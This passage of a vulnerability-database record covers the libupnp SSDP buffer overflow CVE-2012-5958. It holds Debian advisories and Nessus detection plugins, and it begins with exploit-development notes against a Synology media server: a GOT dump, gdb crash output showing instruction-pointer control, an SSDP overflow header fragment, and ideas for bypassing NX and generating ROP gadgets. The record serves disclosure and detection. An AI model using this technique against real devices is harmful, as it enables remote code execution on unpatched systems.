std::__throw_length_error(char const*)\n .got.plt:080BA4E0 off_80BA4E0 dd offset _ZdaPv ; DATA XREF: operator delete[](void *)r\n .got.plt:080BA4E0 ; operator delete[](void *)\n .got.plt:080BA4E4 off_80BA4E4 dd offset exit ; DATA XREF: _exitr\n .got.plt:080BA4E8 off_80BA4E8 dd offset ixmlNode_getNodeType\n .got.plt:080BA4E8 ; DATA XREF: _ixmlNode_getNodeTyper\n .got.plt:080BA4EC off_80BA4EC dd offset UpnpSetDescURL ; DATA XREF: _UpnpSetDescURLr\n .got.plt:080BA4F0 off_80BA4F0 dd offset _ZNSs6assignERKSs\n .got.plt:080BA4F0 ; DATA XREF: std::string::assign(std::string const&)r\n 
.got.plt:080BA4F0 ; std::string::assign(std::string const&)\n .got.plt:080BA4F4 off_80BA4F4 dd offset _ZN11MediaServer18SQLEscapeConditionERKSs\n .got.plt:080BA4F4 ; DATA XREF: MediaServer::SQLEscapeCondition(std::string const&)r\n .got.plt:080BA4F4 ; MediaServer::SQLEscapeCondition(std::string const&)\n .got.plt:080BA4F8 off_80BA4F8 dd offset _ZN11MediaServer15SQLEscapeStringERKSs\n .got.plt:080BA4F8 ; DATA XREF: MediaServer::SQLEscapeString(std::string const&)r\n .got.plt:080BA4F8 ; MediaServer::SQLEscapeString(std::string const&)\n .got.plt:080BA4FC off_80BA4FC dd offset SLIBNetGetInterfaceInfo\n .got.plt:080BA4FC ; DATA XREF: _SLIBNetGetInterfaceInfor\n .got.plt:080BA500 off_80BA500 dd offset free ; DATA XREF: _freer\n .got.plt:080BA504 off_80BA504 dd offset _ZN11MediaServer9URLEncodeERKSs\n .got.plt:080BA504 ; DATA XREF: MediaServer::URLEncode(std::string const&)r\n .got.plt:080BA504 ; MediaServer::URLEncode(std::string const&)\n .got.plt:080BA508 off_80BA508 dd offset _ZNSs12_M_leak_hardEv\n .got.plt:080BA508 ; DATA XREF: std::string::_M_leak_hard(void)r\n .got.plt:080BA508 ; std::string::_M_leak_hard(void)\n .got.plt:080BA50C off_80BA50C dd offset _ZN11MediaServer13StringReplaceESsSsSs\n .got.plt:080BA50C ; DATA XREF: MediaServer::StringReplace(std::string,std::string,std::string)r\n .got.plt:080BA50C ; MediaServer::StringReplace(std::string,std::string,std::string)\n .got.plt:080BA510 off_80BA510 dd offset ixmlLoadDocumentEx\n .got.plt:080BA510 ; DATA XREF: _ixmlLoadDocumentExr\n .got.plt:080BA514 off_80BA514 dd offset pcre_study ; DATA XREF: _pcre_studyr\n .got.plt:080BA518 off_80BA518 dd offset UpnpRegisterRootDevice\n .got.plt:080BA518 ; DATA XREF: _UpnpRegisterRootDevicer\n .got.plt:080BA51C off_80BA51C dd offset _ZN14SynoAudioUtils16RadioGetStationsEjiiRSt6vectorINS_12RadioStationESaIS1_EERi\n .got.plt:080BA51C ; DATA XREF: 
SynoAudioUtils::RadioGetStations(uint,int,int,std::vector<SynoAudioUtils::RadioStation,std::allocator<SynoAudioUtils::RadioStation>> &,int &)r\n .got.plt:080BA51C ; SynoAudioUtils::RadioGetStations(uint,int,int,std::vector<SynoAudioUtils::RadioStation,std::allocator<SynoAudioUtils::RadioStation>> &,int &)\n .got.plt:080BA520 off_80BA520 dd offset memset ; DATA XREF: _memsetr\n .got.plt:080BA524 off_80BA524 dd offset _ZSt20__throw_out_of_rangePKc\n .got.plt:080BA524 ; DATA XREF: std::__throw_out_of_range(char const*)r\n .got.plt:080BA524 ; std::__throw_out_of_range(char const*)\n .got.plt:080BA528 off_80BA528 dd offset strncasecmp ; DATA XREF: _strncasecmpr\n .got.plt:080BA52C off_80BA52C dd offset _ZN4Json5ValueD1Ev\n .got.plt:080BA52C ; DATA XREF: Json::Value::~Value()r\n .got.plt:080BA52C ; Json::Value::~Value()\n .got.plt:080BA530 off_80BA530 dd offset _ZN7pcrecpp3Arg12parse_stringEPKciPv\n .got.plt:080BA530 ; DATA XREF: .plt:pcrecpp::Arg::parse_string(char const*,int,void *)r\n .got.plt:080BA530 ; pcrecpp::Arg::parse_string(char const*,int,void *)\n .got.plt:080BA534 off_80BA534 dd offset ixmlNamedNodeMap_getNamedItem\n .got.plt:080BA534 ; DATA XREF: _ixmlNamedNodeMap_getNamedItemr\n .got.plt:080BA538 off_80BA538 dd offset _ZNSs6assignEPKcj\n .got.plt:080BA538 ; DATA XREF: std::string::assign(char const*,uint)r\n .got.plt:080BA538 ; std::string::assign(char const*,uint)\n .got.plt:080BA53C off_80BA53C dd offset _ZN11MediaServer7MediaDB20AddExcludeVideoCodecESs\n .got.plt:080BA53C ; DATA XREF: MediaServer::MediaDB::AddExcludeVideoCodec(std::string)r\n .got.plt:080BA53C ; MediaServer::MediaDB::AddExcludeVideoCodec(std::string)\n .got.plt:080BA540 off_80BA540 dd offset lseek64 ; DATA XREF: _lseek64r\n .got.plt:080BA544 off_80BA544 dd offset _ZNSt9basic_iosIcSt11char_traitsIcEE4initEPSt15basic_streambufIcS1_E\n .got.plt:080BA544 ; DATA XREF: std::basic_ios<char,std::char_traits<char>>::init(std::basic_streambuf<char,std::char_traits<char>> *)r\n .got.plt:080BA544 ; 
std::basic_ios<char,std::char_traits<char>>::init(std::basic_streambuf<char,std::char_traits<char>> *)\n .got.plt:080BA548 off_80BA548 dd offset _ZN7pcrecpp2RED1Ev\n .got.plt:080BA548 ; DATA XREF: pcrecpp::RE::~RE()r\n .got.plt:080BA548 ; pcrecpp::RE::~RE()\n .got.plt:080BA54C off_80BA54C dd offset _Unwind_Resume ; DATA XREF: __Unwind_Resumer\n .got.plt:080BA550 off_80BA550 dd offset _ZN11MediaServer14FileGetFileExtERKSs\n .got.plt:080BA550 ; DATA XREF: MediaServer::FileGetFileExt(std::string const&)r\n .got.plt:080BA550 ; MediaServer::FileGetFileExt(std::string const&)\n .got.plt:080BA554 off_80BA554 dd offset _ZN11MediaServer19FileGetPathBaseNameERKSs\n .got.plt:080BA554 ; DATA XREF: MediaServer::FileGetPathBaseName(std::string const&)r\n .got.plt:080BA554 ; MediaServer::FileGetPathBaseName(std::string const&)\n .got.plt:080BA558 off_80BA558 dd offset __strtoul_internal\n .got.plt:080BA558 ; DATA XREF: ___strtoul_internalr\n .got.plt:080BA55C off_80BA55C dd offset UpnpSetMaxContentLength\n .got.plt:080BA55C ; DATA XREF: _UpnpSetMaxContentLengthr\n .got.plt:080BA560 off_80BA560 dd offset _ZN11MediaServer7MediaDB14FetchMediaItemER21__tag_SYNO_MEDIA_INFO\n .got.plt:080BA560 ; DATA XREF: MediaServer::MediaDB::FetchMediaItem(__tag_SYNO_MEDIA_INFO &)r\n .got.plt:080BA560 ; MediaServer::MediaDB::FetchMediaItem(__tag_SYNO_MEDIA_INFO &)\n .got.plt:080BA564 off_80BA564 dd offset _ZNKSs5rfindEcj\n .got.plt:080BA564 ; DATA XREF: std::string::rfind(char,uint)r\n .got.plt:080BA564 ; std::string::rfind(char,uint)\n .got.plt:080BA568 off_80BA568 dd offset SYNOPlaylistRecFree\n .got.plt:080BA568 ; DATA XREF: _SYNOPlaylistRecFreer\n .got.plt:080BA56C off_80BA56C dd offset pthread_mutex_unlock\n .got.plt:080BA56C ; DATA XREF: _pthread_mutex_unlockr\n .got.plt:080BA570 off_80BA570 dd offset ixmlDocument_getElementsByTagName\n .got.plt:080BA570 ; DATA XREF: _ixmlDocument_getElementsByTagNamer\n .got.plt:080BA574 off_80BA574 dd offset _ZN11MediaServer7MediaDB6SelectERKSsS2_iiS2_\n 
.got.plt:080BA574 ; DATA XREF: MediaServer::MediaDB::Select(std::string const&,std::string const&,int,int,std::string const&)r\n .got.plt:080BA574 ; MediaServer::MediaDB::Select(std::string const&,std::string const&,int,int,std::string const&)\n .got.plt:080BA578 off_80BA578 dd offset ixmlNodeList_free\n .got.plt:080BA578 ; DATA XREF: _ixmlNodeList_freer\n .got.plt:080BA57C off_80BA57C dd offset __cxa_throw ; DATA XREF: ___cxa_throwr\n .got.plt:080BA580 off_80BA580 dd offset _ZN4Json5ValueixEPKc\n .got.plt:080BA580 ; DATA XREF: Json::Value::operator[](char const*)r\n .got.plt:080BA580 ; Json::Value::operator[](char const*)\n .got.plt:080BA584 off_80BA584 dd offset printfPQExpBuffer\n .got.plt:080BA584 ; DATA XREF: _printfPQExpBufferr\n .got.plt:080BA588 off_80BA588 dd offset UpnpAddVirtualDir\n .got.plt:080BA588 ; DATA XREF: _UpnpAddVirtualDirr\n .got.plt:080BA58C off_80BA58C dd offset _ZN11MediaServer13DMSClientList7FindKeyERKSsS2_\n .got.plt:080BA58C ; DATA XREF: MediaServer::DMSClientList::FindKey(std::string const&,std::string const&)r\n .got.plt:080BA58C ; MediaServer::DMSClientList::FindKey(std::string const&,std::string const&)\n .got.plt:080BA590 off_80BA590 dd offset _ZN11MediaServer7MediaDBC1E21_tag_MEDIA_TABLE_TYPEP13DBConnect_tag\n .got.plt:080BA590 ; DATA XREF: MediaServer::MediaDB::MediaDB(_tag_MEDIA_TABLE_TYPE,DBConnect_tag *)r\n .got.plt:080BA590 ; MediaServer::MediaDB::MediaDB(_tag_MEDIA_TABLE_TYPE,DBConnect_tag *)\n .got.plt:080BA594 off_80BA594 dd offset _ZN11MediaServer16DMSClientChecker17ReleaseClientListEv\n .got.plt:080BA594 ; DATA XREF: MediaServer::DMSClientChecker::ReleaseClientList(void)r\n .got.plt:080BA594 ; MediaServer::DMSClientChecker::ReleaseClientList(void)\n .got.plt:080BA598 off_80BA598 dd offset _ZN4Json18StyledStreamWriter5writeERSoRKNS_5ValueE\n .got.plt:080BA598 ; DATA XREF: Json::StyledStreamWriter::write(std::ostream &,Json::Value const&)r\n .got.plt:080BA598 ; Json::StyledStreamWriter::write(std::ostream &,Json::Value 
const&)\n .got.plt:080BA59C off_80BA59C dd offset _ZN11MediaServer13StringImplodeERKSt6vectorISsSaISsEEPKc\n .got.plt:080BA59C ; DATA XREF: MediaServer::StringImplode(std::vector<std::string,std::allocator<std::string>> const&,char const*)r\n .got.plt:080BA59C ; MediaServer::StringImplode(std::vector<std::string,std::allocator<std::string>> const&,char const*)\n .got.plt:080BA5A0 off_80BA5A0 dd offset __gxx_personality_v0\n .got.plt:080BA5A0 ; DATA XREF: .plt:___gxx_personality_v0r\n .got.plt:080BA5A4 off_80BA5A4 dd offset pcre_free_substring_list\n .got.plt:080BA5A4 ; DATA XREF: _pcre_free_substring_listr\n .got.plt:080BA5A8 off_80BA5A8 dd offset pcre_exec ; DATA XREF: _pcre_execr\n .got.plt:080BA5AC off_80BA5AC dd offset UpnpDownloadXmlDoc\n .got.plt:080BA5AC ; DATA XREF: _UpnpDownloadXmlDocr\n .got.plt:080BA5B0 off_80BA5B0 dd offset read ; DATA XREF: _readr\n .got.plt:080BA5B4 off_80BA5B4 dd offset UpnpGetServerIpAddress\n .got.plt:080BA5B4 ; DATA XREF: _UpnpGetServerIpAddressr\n .got.plt:080BA5B8 off_80BA5B8 dd offset SLIBCErrGet ; DATA XREF: _SLIBCErrGetr\n .got.plt:080BA5BC off_80BA5BC dd offset _ZdlPv ; DATA XREF: operator delete(void *)r\n .got.plt:080BA5BC ; operator delete(void *)\n .got.plt:080BA5C0 off_80BA5C0 dd offset _ZNSt8ios_base4InitD1Ev\n .got.plt:080BA5C0 ; DATA XREF: sub_804D8E6:std::ios_base::Init::~Init()r\n .got.plt:080BA5C0 ; std::ios_base::Init::~Init()\n .got.plt:080BA5C4 off_80BA5C4 dd offset ParsePlayListByField\n .got.plt:080BA5C4 ; DATA XREF: _ParsePlayListByFieldr\n .got.plt:080BA5C4 _got_plt ends\n .got.plt:080BA5C4\n \n\n * Weird\u2026 maybe with other executables\u2026\n\n * When exploiting cve-2012-5958 with x86 / ubuntu 10.04 compilation to simulate the DSM \nenvironment its the register situation at overflow time:\n \n \n Program received signal SIGSEGV, Segmentation fault.\n [Switching to Thread 0xb5fb6b70 (LWP 6628)]\n 0x00414141 in ?? 
()\n (gdb) info registers\n eax 0x0\t0\n ecx 0xb5fb59e0\t-1241818656\n edx 0x0\t0\n ebx 0x42424242\t1111638594\n esp 0xb5fb5c30\t0xb5fb5c30\n ebp 0x42424242\t0x42424242\n esi 0x42424242\t1111638594\n edi 0x42424242\t1111638594\n eip 0x414141\t0x414141\n eflags 0x210282\t[ SF IF RF ID ]\n cs 0x73\t115\n ss 0x7b\t123\n ds 0x7b\t123\n es 0x7b\t123\n fs 0x0\t0\n gs 0x33\t51\n \n\nESP pointing to\n \n \n (gdb) x/xw $esp\n 0xb5fb5c30:\t0x09170ad8\n \n (gdb) x/s 0x09170ad8\n 0x9170ad8:\t \"uuid:schemas:device:\", 'B' <repeats 180 times>...\n \n\nThe contents contained at the pointer at esp can be easily controlled by doing something like\n \n \n \"ST:MSF1uuid:schemas:device:#{bof}:btw\\r\\n\" +\n \n (gdb) c\n Continuing.\n \n Program received signal SIGSEGV, Segmentation fault.\n [Switching to Thread 0xb5f0fb70 (LWP 6729)]\n 0x00414141 in ?? ()\n (gdb) x/x $esp\n 0xb5f0ec30:\t0x09e97918\n (gdb) x/s 0x09e97918\n 0x9e97918:\t \"MSF1uuid:schemas:device:\", 'B' <repeats 176 times>...\n \n\n * If ASLR is disabled / unsupported (old kernels) and system() is mapped to a compatible address with goodchars, \nit could be used to bypass NX.\n\n * If ASLR is disabled and system isn\u2019t mapped to a compatible address, maybe wrappers can be found, for example, for the \ncase of the DMS Media Server, slibcsystem() (and other interesting wrappers for libc) are exported by libsynocore.so.3.1\u2026.. 
\nbut no luck when executing it on an Ubuntu 10.04 box (I guess mappings will be different on the original box, anyway in \nthe original box aslr is enabled):\n \n \n (gdb) disass 0x37d000 + 0x10EBC\n \n Dump of assembler code for function SLIBCSystem:\n 0x0038debc <+0>:\tpush %ebp\n 0x0038debd <+1>:\tmov %esp,%ebp\n 0x0038debf <+3>:\tpush %ebx\n \n\n * In order to run dms on an Ubuntu 10.04 box (easy way), just use the next ld config file: \n\n \n \n (gdb) disass 0x37d000 + 0x10EBC\n \n Dump of assembler code for function SLIBCSystem:\n 0x0038debc <+0>:\tpush %ebp\n 0x0038debd <+1>:\tmov %esp,%ebp\n 0x0038debf <+3>:\tpush %ebx\n \n\nand run ldconfig\n\n * ROP Gadgets can be searched with <http://www.vnsecurity.net/2010/08/ropeme-rop-exploit-made-easy/>, but some API pointers \nin compatible addresses are needed\u2026 tricky \n\n \n \n ROPeMe> generate /home/juan/DSM_40_X64_MediaServer/sbin/dms 5\n Generating gadgets for /home/juan/DSM_40_X64_MediaServer/sbin/dms with backward depth=5\n It may take few minutes depends on the depth and file size...\n Processing code block 1/1\n Generated 2492 gadgets\n Dumping asm gadgets to file: dms.ggt ...\n OK\n \n\n(Using dms because it is not PIE compatible)\n", "modified": "2020-02-13T00:00:00", "published": "2013-01-31T00:00:00", "id": "AKB:8F0E9A23-04D0-42B5-9735-9BC6A4D70879", "href": "https://attackerkb.com/topics/3blYlvxFPa/upnp-unique-service-name-buffer-overflow", "type": "attackerkb", "title": "UPnP unique_service_name Buffer Overflow", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "debian": [{"lastseen": "2020-11-11T13:12:14", "bulletinFamily": "unix", "cvelist": ["CVE-2012-5961", "CVE-2012-5965", "CVE-2012-5960", "CVE-2012-5959", "CVE-2012-5958", "CVE-2012-5964", "CVE-2012-5962", "CVE-2012-5963"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2615-1 security@debian.org\nhttp://www.debian.org/security/ Yves-Alexis 
Perez\nFebruary 01, 2013 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : libupnp4\nVulnerability : several\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2012-5958 CVE-2012-5959 CVE-2012-5960 CVE-2012-5961 \n CVE-2012-5962 CVE-2012-5963 CVE-2012-5964 CVE-2012-5965\nDebian Bug : 699459\n\nMultiple stack-based buffer overflows were discovered in libupnp4, a library\nused for handling the Universal Plug and Play protocol. HD Moore from Rapid7\ndiscovered that SSDP queries were not correctly handled by the\nunique_service_name() function.\n\nAn attacker sending carefully crafted SSDP queries to a daemon built on\nlibupnp4 could generate a buffer overflow, overwriting the stack, leading to\nthe daemon crash and possible remote code execution.\n\nFor the stable distribution (squeeze), these problems have been fixed in\nversion 1.8.0~svn20100507-1+squeeze1.\n\nFor the testing distribution (wheezy), these problems have been fixed in\nversion 1.8.0~svn20100507-1.2.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1.8.0~svn20100507-1.2.\n\nWe recommend that you upgrade your libupnp4 packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 7, "modified": "2013-02-02T11:23:04", "published": "2013-02-02T11:23:04", "id": "DEBIAN:DSA-2615-1:87BCB", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2013/msg00019.html", "title": "[SECURITY] [DSA 2615-1] libupnp4 security update", "type": "debian", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-11T13:24:10", "bulletinFamily": "unix", "cvelist": ["CVE-2012-5961", "CVE-2012-5965", "CVE-2012-5960", "CVE-2012-5959", "CVE-2012-5958", 
"CVE-2012-5964", "CVE-2012-5962", "CVE-2012-5963"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2614-1 security@debian.org\nhttp://www.debian.org/security/ Yves-Alexis Perez\nFebruary 01, 2013 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : libupnp\nVulnerability : several\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2012-5958 CVE-2012-5959 CVE-2012-5960 CVE-2012-5961 \n CVE-2012-5962 CVE-2012-5963 CVE-2012-5964 CVE-2012-5965\nDebian Bug : 699316\n\nMultiple stack-based buffer overflows were discovered in libupnp, a library\nused for handling the Universal Plug and Play protocol. HD Moore from Rapid7\ndiscovered that SSDP queries were not correctly handled by the\nunique_service_name() function.\n\nAn attacker sending carefully crafted SSDP queries to a daemon built on libupnp\ncould generate a buffer overflow, overwriting the stack, leading to the daemon\ncrash and possible remote code execution.\n\nFor the stable distribution (squeeze), these problems have been fixed in\nversion 1:1.6.6-5+squeeze1.\n\nFor the testing distribution (wheezy), these problems have been fixed in\nversion 1:1.6.17-1.2.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1:1.6.17-1.2.\n\nWe recommend that you upgrade your libupnp packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 7, "modified": "2013-02-02T10:17:57", "published": "2013-02-02T10:17:57", "id": "DEBIAN:DSA-2614-1:2F670", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2013/msg00018.html", "title": "[SECURITY] [DSA 2614-1] libupnp security update", "type": "debian", "cvss": {"score": 
10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-12T09:47:46", "description": "Multiple stack-based buffer overflows were discovered in libupnp4, a\nlibrary used for handling the Universal Plug and Play protocol. HD\nMoore from Rapid7 discovered that SSDP queries were not correctly\nhandled by the unique_service_name() function.\n\nAn attacker sending carefully crafted SSDP queries to a daemon built\non libupnp4 could generate a buffer overflow, overwriting the stack,\nleading to the daemon crash and possible remote code execution.", "edition": 17, "published": "2013-02-04T00:00:00", "title": "Debian DSA-2615-1 : libupnp4 - several vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-5961", "CVE-2012-5965", "CVE-2012-5960", "CVE-2012-5959", "CVE-2012-5958", "CVE-2012-5964", "CVE-2012-5962", "CVE-2012-5963"], "modified": "2013-02-04T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:6.0", "p-cpe:/a:debian:debian_linux:libupnp4"], "id": "DEBIAN_DSA-2615.NASL", "href": "https://www.tenable.com/plugins/nessus/64396", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2615. 
The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(64396);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2012-5958\", \"CVE-2012-5959\", \"CVE-2012-5960\", \"CVE-2012-5961\", \"CVE-2012-5962\", \"CVE-2012-5963\", \"CVE-2012-5964\", \"CVE-2012-5965\");\n script_bugtraq_id(57602);\n script_xref(name:\"DSA\", value:\"2615\");\n script_xref(name:\"TRA\", value:\"TRA-2017-10\");\n\n script_name(english:\"Debian DSA-2615-1 : libupnp4 - several vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple stack-based buffer overflows were discovered in libupnp4, a\nlibrary used for handling the Universal Plug and Play protocol. 
HD\nMoore from Rapid7 discovered that SSDP queries where not correctly\nhandled by the unique_service_name() function.\n\nAn attacker sending carefully crafted SSDP queries to a daemon built\non libupnp4 could generate a buffer overflow, overwriting the stack,\nleading to the daemon crash and possible remote code execution.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=699459\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/squeeze/libupnp4\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2013/dsa-2615\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.tenable.com/security/research/tra-2017-10\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the libupnp4 packages.\n\nFor the stable distribution (squeeze), these problems have been fixed\nin version 1.8.0~svn20100507-1+squeeze1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Portable UPnP SDK unique_service_name() Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libupnp4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/02/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/02/04\");\n script_end_attributes();\n\n 
script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"6.0\", prefix:\"libupnp4\", reference:\"1.8.0~svn20100507-1+squeeze1\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libupnp4-dbg\", reference:\"1.8.0~svn20100507-1+squeeze1\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libupnp4-dev\", reference:\"1.8.0~svn20100507-1+squeeze1\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libupnp4-doc\", reference:\"1.8.0~svn20100507-1+squeeze1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T10:11:37", "description": "Unbundle libupnp.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 15, "published": "2013-02-21T00:00:00", "title": "Fedora 17 : mediatomb-0.12.1-23.fc17 (2013-2352)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-5961", "CVE-2012-5965", "CVE-2012-5960", "CVE-2012-5959", "CVE-2012-5958", "CVE-2012-5964", "CVE-2012-5962", "CVE-2012-5963"], "modified": "2013-02-21T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:17", "p-cpe:/a:fedoraproject:fedora:mediatomb"], "id": "FEDORA_2013-2352.NASL", "href": "https://www.tenable.com/plugins/nessus/64735", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2013-2352.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(64735);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2012-5958\", \"CVE-2012-5959\", \"CVE-2012-5960\", \"CVE-2012-5961\", \"CVE-2012-5962\", \"CVE-2012-5963\", \"CVE-2012-5964\", \"CVE-2012-5965\");\n script_bugtraq_id(57602);\n script_xref(name:\"FEDORA\", value:\"2013-2352\");\n script_xref(name:\"TRA\", value:\"TRA-2017-10\");\n\n script_name(english:\"Fedora 17 : mediatomb-0.12.1-23.fc17 (2013-2352)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Unbundle libupnp.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=883790\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2013-February/099069.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b261b399\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.tenable.com/security/research/tra-2017-10\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected mediatomb package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Portable UPnP SDK unique_service_name() Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:mediatomb\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:17\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/02/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/02/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^17([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 17.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 